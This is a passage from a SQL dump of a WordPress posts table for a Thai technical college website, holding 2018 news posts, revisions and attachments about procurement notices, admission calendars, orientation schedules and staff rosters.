'closed', 'closed', '', '752-revision-v1', '', '', '2018-01-21 15:24:32', '2018-01-21 08:24:32', '', 752, 'http://www.technicrayong.ac.th/752-revision-v1/', 0, 'revision', '', 0),
(754, 1, '2018-01-21 15:25:49', '2018-01-21 08:25:49', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"1080\" height=\"1526\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'publish', 'closed', 'open', '', '%e0%b8%8a%e0%b8%b5%e0%b9%89%e0%b9%81%e0%b8%88%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89-2', '', '', '2018-03-27 08:58:21', '2018-03-27 01:58:21', '', 0, 'http://www.technicrayong.ac.th/?p=754', 485, 'post', '', 0),
(755, 1, '2018-01-21 15:25:49', '2018-01-21 08:25:49', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"1080\" height=\"1526\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'inherit', 'closed', 'closed', '', '754-revision-v1', '', '', '2018-01-21 15:25:49', '2018-01-21 08:25:49', '', 754, 'http://www.technicrayong.ac.th/754-revision-v1/', 0, 'revision', '', 0),
(756, 1, '2018-01-21 15:26:43', '2018-01-21 08:26:43', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%b0%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2-%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a5%e0%b8%9b%e0%b8%b5%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88', '', '', '2018-03-27 09:00:10', '2018-03-27 02:00:10', '', 0, 'http://www.technicrayong.ac.th/?p=756', 475, 'post', '', 0),
(757, 1, '2018-01-21 15:26:43', '2018-01-21 08:26:43', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'inherit', 'closed', 'closed', '', '756-revision-v1', '', '', '2018-01-21 15:26:43', '2018-01-21 08:26:43', '', 756, 'http://www.technicrayong.ac.th/756-revision-v1/', 0, 'revision', '', 0),
(758, 1, '2018-01-21 15:27:40', '2018-01-21 08:27:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D530145487361644%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'นักเรียน ระดับชั้น ปวช.3 สาขาวิชาการตลาด วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ 2 ในการประกวดโครงการยุวชนประกันภัย ระดับจังหวัด', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a%e0%b8%8a%e0%b8%b1%e0%b9%89%e0%b8%99-%e0%b8%9b%e0%b8%a7%e0%b8%8a-3-%e0%b8%aa-2', '', '', '2018-03-27 08:59:24', '2018-03-27 01:59:24', '', 0, 'http://www.technicrayong.ac.th/?p=758', 473, 'post', '', 0),
(759, 1, '2018-01-21 15:27:40', '2018-01-21 08:27:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D530145487361644%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'นักเรียน ระดับชั้น ปวช.3 สาขาวิชาการตลาด วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ 2 ในการประกวดโครงการยุวชนประกันภัย ระดับจังหวัด', '', 'inherit', 'closed', 'closed', '', '758-revision-v1', '', '', '2018-01-21 15:27:40', '2018-01-21 08:27:40', '', 758, 'http://www.technicrayong.ac.th/758-revision-v1/', 0, 'revision', '', 0),
(762, 1, '2018-01-21 15:36:27', '2018-01-21 08:36:27', 'News-TH', 'ข่าว', '', 'publish', 'closed', 'closed', '', 'news', '', '', '2022-04-29 12:30:30', '2022-04-29 05:30:30', '', 0, 'http://www.technicrayong.ac.th/?p=762', 2, 'nav_menu_item', '', 0),
(763, 1, '2018-01-21 15:36:27', '2018-01-21 08:36:27', 'Events-TH', 'กิจกรรม', '', 'publish', 'closed', 'closed', '', 'events', '', '', '2022-04-29 12:30:30', '2022-04-29 05:30:30', '', 0, 'http://www.technicrayong.ac.th/?p=763', 3, 'nav_menu_item', '', 0),
(764, 1, '2018-01-21 15:41:52', '2018-01-21 08:41:52', ' ไทย', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-21 15:41:52', '2018-01-21 08:41:52', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(765, 1, '2018-01-21 15:42:17', '2018-01-21 08:42:17', ' English', '', '', 'inherit', 'closed', 'closed', '', '715-revision-v1', '', '', '2018-01-21 15:42:17', '2018-01-21 08:42:17', '', 715, 'http://www.technicrayong.ac.th/715-revision-v1/', 0, 'revision', '', 0),
(766, 1, '2018-01-21 15:42:57', '2018-01-21 08:42:57', ' English', 'en', '', 'inherit', 'closed', 'closed', '', '715-revision-v1', '', '', '2018-01-21 15:42:57', '2018-01-21 08:42:57', '', 715, 'http://www.technicrayong.ac.th/715-revision-v1/', 0, 'revision', '', 0),
(775, 3, '2018-01-23 15:24:02', '2018-01-23 08:24:02', '<h2><strong>-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)</strong></h2>\r\n<h2><strong> -รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)</strong></h2>\r\n \r\n\r\n<img class=\"aligncenter wp-image-799\" src=\"/wp-content/uploads/2018/01/27023423_533006667075526_6777013135087833409_o-212x300.jpg\" alt=\"\" width=\"615\" height=\"870\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตรปวช. และหลักสูตรปวส.', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5', '', '', '2018-01-25 15:40:28', '2018-01-25 08:40:28', '', 0, 'http://www.technicrayong.ac.th/?p=775', 472, 'post', '', 0),
(776, 3, '2018-01-23 15:24:02', '2018-01-23 08:24:02', '-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)\r\n-รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)\r\n\r\n ', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตร ปวช.(ม.3) และหลักสูตร ปวส.(ม.6)', '', 'inherit', 'closed', 'closed', '', '775-revision-v1', '', '', '2018-01-23 15:24:02', '2018-01-23 08:24:02', '', 775, 'http://www.technicrayong.ac.th/775-revision-v1/', 0, 'revision', '', 0),
(777, 3, '2018-01-23 15:28:04', '2018-01-23 08:28:04', '', 'ปฏิทินการรับสมัคร ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3-%e0%b8%9b%e0%b8%b5%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-01-23 15:28:53', '2018-01-23 08:28:53', '', 775, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561.jpg', 0, 'attachment', 'image/jpeg', 0),
(778, 3, '2018-01-23 15:29:26', '2018-01-23 08:29:26', '-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)\r\n-รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)\r\n\r\n<img class=\" wp-image-777 alignleft\" src=\"/wp-content/uploads/2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\" alt=\"\" width=\"508\" height=\"719\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตร ปวช.(ม.3) และหลักสูตร ปวส.(ม.6)', '', 'inherit', 'closed', 'closed', '', '775-revision-v1', '', '', '2018-01-23 15:29:26', '2018-01-23 08:29:26', '', 775, 'http://www.technicrayong.ac.th/775-revision-v1/', 0, 'revision', '', 0),
(779, 3, '2018-01-25 15:28:29', '2018-01-25 08:28:29', '<h2><strong>-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)</strong></h2>\n<h2><strong> -รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)</strong></h2>\n \n\n<img class=\"wp-image-777 aligncenter\" src=\"/wp-content/uploads/2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\" alt=\"\" width=\"574\" height=\"812\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตรปวช. และหลักสูตรปวส.', '', 'inherit', 'closed', 'closed', '', '775-autosave-v1', '', '', '2018-01-25 15:28:29', '2018-01-25 08:28:29', '', 775, 'http://www.technicrayong.ac.th/775-autosave-v1/', 0, 'revision', '', 0),
(780, 3, '2018-01-23 15:32:12', '2018-01-23 08:32:12', '<h2><strong>-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)</strong></h2>\r\n<h2><strong> -รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)</strong></h2>\r\n \r\n\r\n<img class=\"wp-image-777 aligncenter\" src=\"/wp-content/uploads/2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\" alt=\"\" width=\"574\" height=\"812\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตร ปวช.(ม.3) และหลักสูตร ปวส.(ม.6)', '', 'inherit', 'closed', 'closed', '', '775-revision-v1', '', '', '2018-01-23 15:32:12', '2018-01-23 08:32:12', '', 775, 'http://www.technicrayong.ac.th/775-revision-v1/', 0, 'revision', '', 0),
(781, 3, '2018-01-23 15:43:42', '2018-01-23 08:43:42', '', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ปวช.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%90%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5', '', '', '2018-01-23 15:47:02', '2018-01-23 08:47:02', '', 783, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1.jpg', 0, 'attachment', 'image/jpeg', 0),
(782, 3, '2018-01-23 15:43:46', '2018-01-23 08:43:46', '', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ปวส.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%90%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5-2', '', '', '2018-01-23 15:47:55', '2018-01-23 08:47:55', '', 783, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1.jpg', 0, 'attachment', 'image/jpeg', 0),
(783, 3, '2018-01-23 15:51:06', '2018-01-23 08:51:06', '<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 1 วันที่ 1-3 พฤษภาคม 2561 (นักเรียนชาย)\r\n- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 2 วันที่ 3-5 พฤษภาคม 2561 (นักเรียนหญิง)\r\n<span class=\"text_exposed_show\">\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 3 วันที่ 7-9 พฤษภาคม 2561 (นักศึกษาชาย)\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 4 วันที่ 9-11 พฤษภาคม 2561 (นักศึกษาหญิง)</span></h4>\r\nณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง\r\n\r\n<img class=\"wp-image-781 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\" alt=\"\" width=\"653\" height=\"924\" /><img class=\"wp-image-782 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\" alt=\"\" width=\"679\" height=\"960\" />', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%90%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5', '', '', '2018-01-23 15:53:38', '2018-01-23 08:53:38', '', 0, 'http://www.technicrayong.ac.th/?p=783', 471, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(784, 3, '2018-01-23 15:51:06', '2018-01-23 08:51:06', '<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 1 วันที่ 1-3 พฤษภาคม 2561 (นักเรียนชาย)</h4>\r\n<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 2 วันที่ 3-5 พฤษภาคม 2561 (นักเรียนหญิง)</h4>\r\n<h4>\r\n<span class=\"text_exposed_show\">\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 3 วันที่ 7-9 พฤษภาคม 2561 (นักศึกษาชาย)</span></h4>\r\n<h4><span class=\"text_exposed_show\">- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 4 วันที่ 9-11 พฤษภาคม 2561 (นักศึกษาหญิง)</span></h4>\r\n<h4><span class=\"text_exposed_show\">\r\n\r\nณ วัดมาบตาพุด ตำบลมาบตาพุด </span><span class=\"text_exposed_show\">อำเภอเมือง จังหวัดระยอง</span></h4>\r\n<img class=\" wp-image-781 alignleft\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\" alt=\"\" width=\"429\" height=\"607\" /><img class=\" wp-image-782 alignright\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\" alt=\"\" width=\"431\" height=\"610\" />', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '783-revision-v1', '', '', '2018-01-23 15:51:06', '2018-01-23 08:51:06', '', 783, 'http://www.technicrayong.ac.th/783-revision-v1/', 0, 'revision', '', 0),
(785, 3, '2018-01-23 15:53:35', '2018-01-23 08:53:35', '<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 1 วันที่ 1-3 พฤษภาคม 2561 (นักเรียนชาย)\n- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 2 วันที่ 3-5 พฤษภาคม 2561 (นักเรียนหญิง)\n<span class=\"text_exposed_show\">\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 3 วันที่ 7-9 พฤษภาคม 2561 (นักศึกษาชาย)\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 4 วันที่ 9-11 พฤษภาคม 2561 (นักศึกษาหญิง)</span></h4>\nณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง\n\n<img class=\"wp-image-781 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\" alt=\"\" width=\"653\" height=\"924\" /><img class=\"wp-image-782 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\" alt=\"\" width=\"679\" height=\"960\" />', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '783-autosave-v1', '', '', '2018-01-23 15:53:35', '2018-01-23 08:53:35', '', 783, 'http://www.technicrayong.ac.th/783-autosave-v1/', 0, 'revision', '', 0),
(786, 3, '2018-01-23 15:52:31', '2018-01-23 08:52:31', '<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 1 วันที่ 1-3 พฤษภาคม 2561 (นักเรียนชาย)\r\n- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 2 วันที่ 3-5 พฤษภาคม 2561 (นักเรียนหญิง)\r\n<span class=\"text_exposed_show\">\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 3 วันที่ 7-9 พฤษภาคม 2561 (นักศึกษาชาย)\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 4 วันที่ 9-11 พฤษภาคม 2561 (นักศึกษาหญิง)\r\n\r\nณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง</span></h4>\r\n<img class=\" wp-image-781 alignleft\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\" alt=\"\" width=\"429\" height=\"607\" /><img class=\" wp-image-782 alignright\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\" alt=\"\" width=\"431\" height=\"610\" />', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '783-revision-v1', '', '', '2018-01-23 15:52:31', '2018-01-23 08:52:31', '', 783, 'http://www.technicrayong.ac.th/783-revision-v1/', 0, 'revision', '', 0),
(787, 3, '2018-01-23 15:53:38', '2018-01-23 08:53:38', '<h4>- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 1 วันที่ 1-3 พฤษภาคม 2561 (นักเรียนชาย)\r\n- ระดับ ปวช.1 ทุกสาขาวิชา รุ่นที่ 2 วันที่ 3-5 พฤษภาคม 2561 (นักเรียนหญิง)\r\n<span class=\"text_exposed_show\">\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 3 วันที่ 7-9 พฤษภาคม 2561 (นักศึกษาชาย)\r\n- ระดับ ปวส.1 ทุกสาขาวิชา รุ่นที่ 4 วันที่ 9-11 พฤษภาคม 2561 (นักศึกษาหญิง)</span></h4>\r\nณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง\r\n\r\n<img class=\"wp-image-781 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\" alt=\"\" width=\"653\" height=\"924\" /><img class=\"wp-image-782 aligncenter\" src=\"/wp-content/uploads/2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\" alt=\"\" width=\"679\" height=\"960\" />', 'กำหนดการปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '783-revision-v1', '', '', '2018-01-23 15:53:38', '2018-01-23 08:53:38', '', 783, 'http://www.technicrayong.ac.th/783-revision-v1/', 0, 'revision', '', 0),
(788, 1, '2018-01-24 15:12:17', '2018-01-24 08:12:17', '<a href=\"/wp-content/uploads/2018/01/manual-rms-for-teacher-2-2560.pdf\">คลิ๊กเพื่อเปิดดู</a>', 'Power Point อบรม RMS สำหรับครูผู้สอน', '', 'publish', 'closed', 'open', '', 'power-point-%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-rms-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%aa%e0%b8%ad%e0%b8%99', '', '', '2018-02-11 15:12:19', '2018-02-11 08:12:19', '', 0, 'http://www.technicrayong.ac.th/?p=788', 470, 'post', '', 0),
(790, 1, '2018-01-24 15:12:17', '2018-01-24 08:12:17', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F01%2F%E0%B8%97%E0%B8%B3%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B8%A3%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%81%E0%B8%A3%E0%B8%94-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Power Point อบรม RMS สำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '788-revision-v1', '', '', '2018-01-24 15:12:17', '2018-01-24 08:12:17', '', 788, 'http://www.technicrayong.ac.th/788-revision-v1/', 0, 'revision', '', 0),
(791, 1, '2018-01-24 15:13:42', '2018-01-24 08:13:42', '<a href=\"/wp-content/uploads/2018/01/ทำตาราง-กรอกเกรด-2-2560.pdf\">คลิ๊กเพื่อเปิดดู</a>', 'Power Point อบรม RMS สำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '788-revision-v1', '', '', '2018-01-24 15:13:42', '2018-01-24 08:13:42', '', 788, 'http://www.technicrayong.ac.th/788-revision-v1/', 0, 'revision', '', 0),
(794, 3, '2018-01-25 13:14:39', '2018-01-25 06:14:39', '[pdfjs-viewer url=\"/wp-content/uploads/2018/01/Watch-guard-chedule-02-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98', '', '', '2018-02-11 15:13:45', '2018-02-11 08:13:45', '', 0, 'http://www.technicrayong.ac.th/?p=794', 469, 'post', '', 0),
(795, 3, '2018-01-25 13:13:52', '2018-01-25 06:13:52', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F01%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B8%E0%B8%A1%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%B1%E0%B8%99%E0%B8%98%E0%B9%8C-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '794-revision-v1', '', '', '2018-01-25 13:13:52', '2018-01-25 06:13:52', '', 794, 'http://www.technicrayong.ac.th/794-revision-v1/', 0, 'revision', '', 0),
(796, 3, '2018-01-25 13:17:16', '2018-01-25 06:17:16', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0-e-bidding-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศรายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพของนักเรียนสายอาชีพ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-01-25 13:17:43', '2018-01-25 06:17:43', '', 0, 'http://www.technicrayong.ac.th/?p=796', 468, 'post', '', 0),
(797, 3, '2018-01-25 13:16:59', '2018-01-25 06:16:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0-e-bidding-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศรายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพของนักเรียนสายอาชีพ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '796-revision-v1', '', '', '2018-01-25 13:16:59', '2018-01-25 06:16:59', '', 796, 'http://www.technicrayong.ac.th/796-revision-v1/', 0, 'revision', '', 0),
